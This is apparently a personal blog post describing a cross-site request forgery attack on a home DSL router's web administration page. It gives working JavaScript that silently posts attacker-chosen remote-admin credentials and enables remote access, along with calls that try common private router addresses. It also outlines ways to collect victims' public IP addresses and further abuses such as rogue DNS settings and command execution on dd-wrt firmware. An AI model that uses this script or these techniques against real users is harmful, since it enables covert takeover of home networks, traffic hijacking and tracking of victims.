This has been a known issue for a few years, but it is surprising that DSL modem/router manufacturers have still not fixed it (at least not mine ;)). My router's administration web server accepts HTTP POST requests from a user with an authenticated session without validating them against any anti-CSRF token or checking the Referer header. Thus, the router accepts requests originating from the user's browser regardless of whether the request was generated voluntarily by the user from the router's web interface or by an automated script hosted on another website acting on the user's behalf. The latter is the risky condition we are talking about.
I wrote a small proof-of-concept JavaScript that crafts a POST request to a specific URL of the router's web server in order to open the router to remote administration. This URL also accepts the credentials used for connecting remotely. Hence, the malicious script pushes a username and password of the attacker's choice, using the victim's authenticated session with the DSL router.
The above part is very easy to perform, and the result is that the victim's modem is configured to welcome remote connections over the public network. The challenge for the attacker now is to find the public IP address of the victim; otherwise the above actions are of no use. Some techniques are possible:
1. Push settings for DDNS into the DSL router's configuration
2. Host a listener online which logs incoming connections' IP addresses and make the above malicious script place a sample request to this listener.
3. Include an additional script that connects to a service like whatismyip.com, fetches the public IP address and posts it on some anonymous board online (a little difficult to achieve due to browser restrictions)
The first one is manageable if the attack is targeted at one particular individual. If the router reboots or changes IP address, the attacker can still keep track of it. There are many free DDNS services available online, and the attacker can maintain anonymity too.
The second one risks the attacker being identified through ownership of the listener service, but multiple victims can be targeted and maintained.
The third option provides both anonymity and unlimited victims, but is very difficult to achieve due to browser restrictions. I am still working on a sample JavaScript to achieve it, but there are a couple of things holding me back:
a. The response from whatismyip.com or any other service cannot be accessed by a script running on another domain.
b. I haven't yet found an anonymous online board which I can use to post messages using automated scripts. This is mainly due to the CAPTCHA or other human-verification tools used by these services.
Another challenge is to guess the private IP address of the DSL router, which the JavaScript needs in order to write configuration data successfully. The most common ones are 192.168.0.1, 192.168.1.1, 10.0.0.1, 10.0.1.1 and so on. All the most likely IP addresses can be targeted/brute-forced. Finally, below is the script I wrote specifically for my router. It will vary depending on the make and model of the router.
```html
<script type="text/javascript">
function post_to_url(router) {
    var method = "post";
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", "http://" + router + "/remote_config");

    // POST variables: remote-admin credentials and the two flags the page expects
    var userid = document.createElement("input");
    userid.setAttribute("type", "hidden");
    userid.setAttribute("name", "__AdminUserID");
    userid.setAttribute("value", "hacker");
    form.appendChild(userid);

    var password = document.createElement("input");
    password.setAttribute("type", "hidden");
    password.setAttribute("name", "__AdminPassword");
    password.setAttribute("value", "hackerpass");
    form.appendChild(password);

    var timeoutdisable = document.createElement("input");
    timeoutdisable.setAttribute("type", "hidden");
    timeoutdisable.setAttribute("name", "TimeOut_Disable");
    timeoutdisable.setAttribute("value", "on");
    form.appendChild(timeoutdisable);

    var enableremoteaccess = document.createElement("input");
    enableremoteaccess.setAttribute("type", "hidden");
    enableremoteaccess.setAttribute("name", "Enable_RemoteAccess");
    enableremoteaccess.setAttribute("value", "on");
    form.appendChild(enableremoteaccess);

    // The form must be in the document before submit() works in all browsers
    document.body.appendChild(form);
    form.submit();
}
</script>
```
The above script sets the POST parameters __AdminUserID, __AdminPassword, TimeOut_Disable and Enable_RemoteAccess to values of the attacker's choice and makes a POST request to the router's IP address. I have masked the actual parameters used by my DSL modem (for no reason at all ;)), but as long as you get the parameter names right, the attack surely works.
The script can be called using the following:
```html
<script>post_to_url("192.168.0.1")</script>
<script>post_to_url("192.168.1.1")</script>
<script>post_to_url("10.0.1.1")</script>
```
I also have a few wireless routers lying around with the dd-wrt firmware on them. Next, my goal is to test whether a similar attack works on them too.
In conclusion, there are several pre-conditions that dictate the success or failure of this kind of attack:
1. Victim visits the malicious website
2. Victim has an authenticated session with the router's web interface
3. The modem has not changed its public IP address
4. The POST request contains the exact parameters required to make the change.
Such an attack can have more damaging effects:
a. The DNS address in the modem configuration is set to a malicious DNS server
b. The SSID and network key of the router are modified
c. A denial-of-service attack is carried out by blocking access to certain public IPs/URLs on the internet
d. The dd-wrt firmware allows users to execute commands from the web interface, so the attacker can craft a request that runs any command on the victim's router